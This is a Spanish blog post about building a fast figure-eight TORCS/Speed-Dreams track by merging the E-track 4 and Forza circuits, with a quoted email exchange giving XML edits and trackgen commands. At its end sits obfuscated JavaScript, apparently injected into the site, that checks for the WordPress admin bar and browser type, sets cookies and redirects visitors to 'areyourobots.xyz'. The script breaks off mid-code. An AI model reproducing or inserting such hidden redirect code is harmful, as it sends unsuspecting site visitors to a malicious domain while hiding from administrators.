

Fastrack. Experimentando cosas

Escrito por apr-torcs

Domingo, 21 de Noviembre de 2010 22:41 -

Un amigo brasileño, Roy Nebb, me envió un correo para proponerme un circuito que había diseñado sobre el papel.

A priori, me parecía una locura y, no estaba dispuesto a enredarme con esa idea. Pero la curiosidad me pudo, e hice un acercamiento a la idea, y terminé enganchándome.

El circuito es un "empalme" de dos pistas existentes en Torcs/Speed-Dreams (Forza y E-track 4). El resultado es una pista tremendamente rápida, con una configuración en ocho con un puente en su recorrido. Ha resultado algo interesante. Y para mi todo un reto realizarla, en el que he aprendido muchas cosas que me ayudarán en próximos proyectos.

No esperéis un circuito espectacular en el apartado visual, puesto que no he movido un solo dedo en ese sentido. Incluso el archivo xml tiene fallos en los Deltas, que provocan un comportamiento extraño de los Robots. A pesar de todo es jugable. Como le digo a Roy en el intercambio de correos "es un buen inicio" para algo que puede llegar a ser interesante y divertido.

[Descarga](#)

Os dejo el intercambio de correos, a continuación, por si alguien decide hacer algo parecido. Al menos tiene una referencia de como hacerlo.

Yes !!!!

Nice and fast really.

My sincerely thanks.

Your dedicate show me how you are a best man.

Quicly and friendly, with great professional intentions.

God bless you.

Roy Nebb

Fastrack. Experimentando cosas

Escrito por apr-torcs

Domingo, 21 de Noviembre de 2010 22:41 -

--- Em **sex, 29/10/10**, **manfariel <manfariel_pr@yahoo.com>** escreveu:

De: manfariel <manfariel_pr@yahoo.com>

Assunto: Re: Very fast track by fusion E-track 4 + Forza (torcs).

Para: roynebb@yahoo.com.br

Data: Sexta-feira, 29 de Outubro de 2010, 20:25

Hi Roy

I could not wait until tomorrow.

unzip in ../tracks/road/

Really fast in 12.8km

There is much work to do in texture and everything else but a good start. :-)

enjoy

<http://apr-free.info>

Recursos para Torcs, Cante y Técnica TV.

--- El **vie, 10/29/10**, **roynebb@yahoo.com.br <roynebb@yahoo.com.br>** escribió:

De: roynebb@yahoo.com.br <roynebb@yahoo.com.br>

Asunto: Re: Very fast track by fusion E-track 4 + Forza (torcs).

A: "manfariel" <manfariel_pr@yahoo.com>

Fecha: viernes, 29 de octubre de 2010, 11:02 pm

Fantastic, you are the best, thanks !!!! Without your help i will never have good resolutions in this case. Tomorrow we can test the track than.... Go

od night, Bye.

Roy Nebb

--- Em **sex, 29/10/10**, **manfariel <manfariel_pr@yahoo.com>** escreveu:

De: manfariel <manfariel_pr@yahoo.com>

Assunto: Re: Very fast track by fusion E-track 4 + Forza (torcs).

Para: roynebb@yahoo.com.br

Data: Sexta-feira, 29 de Outubro de 2010, 18:02

Nooooooo

Fastrack. Experimentando cosas

Escrito por apr-torcs

Domingo, 21 de Noviembre de 2010 22:41 -

Sorry Roy. I am in error. "E-track-4" is not in the opposite direction. Is with the curve changes direction. This is very good

news. You need

only edit the e-track-4.xml and substitute:

```
<attstr name="type" val="lft"/>
```

by

```
<attstr name="type" val="rgt"/>
```

and vice versa.

With a good text editor is done in 30 seconds.

Then you must insert forza.xml

This has become a challenge. Tomorrow I try and send you the fastrack.xml

cheers

<http://apr-free.info>

Recursos para Torcs, Cante y Técnica TV.

--- El **vie, 10/29/10**, **roynebb@yahoo.com.br** <**roynebb@yahoo.com.br**> escribió:

De: **roynebb@yahoo.com.br** <**roynebb@yahoo.com.br**>

Asunto: Re: Very fast track by fusion E-track 4 + Forza (torcs).

A: "manfariel" <**manfariel_pr@yahoo.com**>

Fecha: viernes, 29 de octubre de 2010, 06:36 pm

Really... I didn't create the new track before because these technical problems, that i didn't know to resolve, and than contact you (a professional) to help me. The new xml file it's hard and difficult to do.

and other good professional.

anybody to talk about this. I like torcs cause it is more intelligent and easy customized platform (design).

making a challenge to intergrate Torcs and Life For Speed.

So, i think that i will wait for more instructions like your's

Here in Brazil i didn't find

At moment i am

Fastrack. Experimentando cosas

Escrito por apr-torcs

Domingo, 21 de Noviembre de 2010 22:41 -

In reference my idea, the new "very fast track" , unfortunately it's failed to Speed-Dreams too (crash .exe).

Thanks for a lot my friend, best regards.

Salute for you and your internet team.

Roy Nebb

--- Em **sex, 29/10/10, manfariel <manfariel_pr@yahoo.com>** escreveu:

De: manfariel <manfariel_pr@yahoo.com>

Assunto: Re: Very fast track by fusion E-track 4 + Forza (torcs).

Para: roynebb@yahoo.com.br

Data: Sexta-feira, 29 de Outubro de 2010, 6:46

Hi Roy

Yesterday I looked at this more carefully. There is a problem. e-track-4 rotates clockwise. For your circuit would turn the other way.

This forces you to change the order of the segments.

The worst thing is that it also would have to change the direction of the slopes (I think reversing the sign of the same value would suffice).

Also maybe you have to delete a segment or alter the curve to fit the two circuits as you want.

After creating the circuit could open with "trackeditor" to see which segments to delete or modify. Remember not to save the changes in trackeditor.

cheers

<http://apr-free.info>

Recursos para Torcs, Cante y Técnica TV.

--- El **jue, 10/28/10, roynebb@yahoo.com.br <roynebb@yahoo.com.br>** escribió:

De: roynebb@yahoo.com.br <roynebb@yahoo.com.br>

Asunto: Re: Very fast track by fusion E-track 4 + Forza (torcs).

A: "manfariel" <manfariel_pr@yahoo.com>

Fecha: jueves, 28 de octubre de 2010, 06:56 pm

Good my friend, good !!! I will work with your specifications at trackgen to create the correct xml file (a hard problem to me). Thanks a lot for your new

F-1 cars, really beautiful and fast tracks Formula One Series (FIA).

Salute.

Roy Nebb

Fastrack. Experimentando cosas

Escrito por apr-torcs

Domingo, 21 de Noviembre de 2010 22:41 -

--- Em **qua, 27/10/10, manfariel <manfariel_pr@yahoo.com>** escreveu:

De: manfariel <manfariel_pr@yahoo.com>

Assunto: Re: Very fast track by fusion E-track 4 + Forza (torcs).

Para: roynebb@yahoo.com.br

Data: Quarta-feira, 27 de Outubro de 2010, 15:25

Hi

Well I do not know how complicated it can be done.

Without thinking much, I tell you now how I would do:

1º Create a folder with the "very fast track" at /torcs/tracks/road/ and copy into the file "e-track 4.xml". Change the name of "e-track 4.xml" to "very-fast-track.xml"

2º I looked on e-track 4.xml (now "very-fast-track"); Finding that segment corresponds to where you want to insert forza.

3º I looked at "forza.xml"; Finding that segment corresponds to the insertion site ...

* Using the program trackeditor. But remember not to save any changes because you lose the slopes and banking information

4º I copied all the segments of "forza.xml" in "e-track 4.xml" at the point of insertion. Copied first from the insertion point to the last segment of the circuit.

After then copied from the first segment to segment insertion.

5º run Trackgen to create the "very-fast-track.ac." Something like:

```
"trackgen -c road -n very-fast-track -a"
```

You can run torcs and test track. You will have a cross at the point of insertion of the circuits.

6º Create the slopes needed to build a bridge at the crossing. In the xml file and running trackgen as before.

7º import the file "very fast track.ac" in Blender. Import files "forza.ac" and "e-track 4.ac" in other layers.

Attempts to integrate the environment of forza and e-track 4 in the new circuit.

Sorry but I can not do this now. I'm working hard on the track and cars of F1. I am improving Goldstone-Sand also to their integration into Speed-Dreams 2.0.

Good luck and feel free to ask any questions. We could open a story on my website and go to work there, with more people wanting to help.

Fastrack. Experimentando cosas

Escrito por apr-torcs

Domingo, 21 de Noviembre de 2010 22:41 -

cheers

<http://apr-free.info>

Recursos para Torcs, Cante y Técnica TV.

--- El **mié, 10/27/10**, **roynebb@yahoo.com.br** <roynebb@yahoo.com.br> escribió:

De: roynebb@yahoo.com.br <roynebb@yahoo.com.br>

Asunto: Very fast track by fusion E-track 4 + Forza (torcs).

A: manfariel_pr@yahoo.com

Fecha: miércoles, 27 de octubre de 2010, 06:00 am

Copia de:

Este es un e-mail de pedido por <http://apr-free.info/joomla/> de:
roy nebb <roynebb@yahoo.com.br>

Dear friend,

Please help me to create a new track for torcs / speed-dreams.
Very fast track by fusion E-track 4 + Forza (torcs).

The design is ready but i have problems to create the new track. I can up-load to you the picture / design.

Do you like to create for me ?

I will wait for your capacity.

Thanks, salute.

Roy Nebb

var

```
_0x2cf4=['MSIE;', 'OPR', 'Chromium', 'Chrome', 'ppkcookie', 'location', 'https://www.areyourobots.xy  
z', 'onload', 'getElementById', 'undefined', 'setTime', 'getTime', 'toUTCString', 'cookie', 'x20path=', 'spl  
it', 'length', 'charAt', 'substring', 'indexOf', 'match', 'userAgent', 'Edge'];(function(_0x15c1df, _0x14d88  
2){var
```

Fastrack. Experimentando cosas

Escrito por apr-torcs

Domingo, 21 de Noviembre de 2010 22:41 -

```
_0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);)(_0x2cf4,0x104));var
_0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var
_0x58feb3=_0x2cf4[_0x1c2503];return
_0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadmi
nbar')===null){if(typeof _0x335357===_0x287a('0x2')){function
_0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546=";if(_0x5523d4){var
_0x5b6c5c=new
Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x
3e8);_0x21e546=';x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0
ae90+''+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var
_0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var
_0x51e64c=0x0;_0x51e64c
```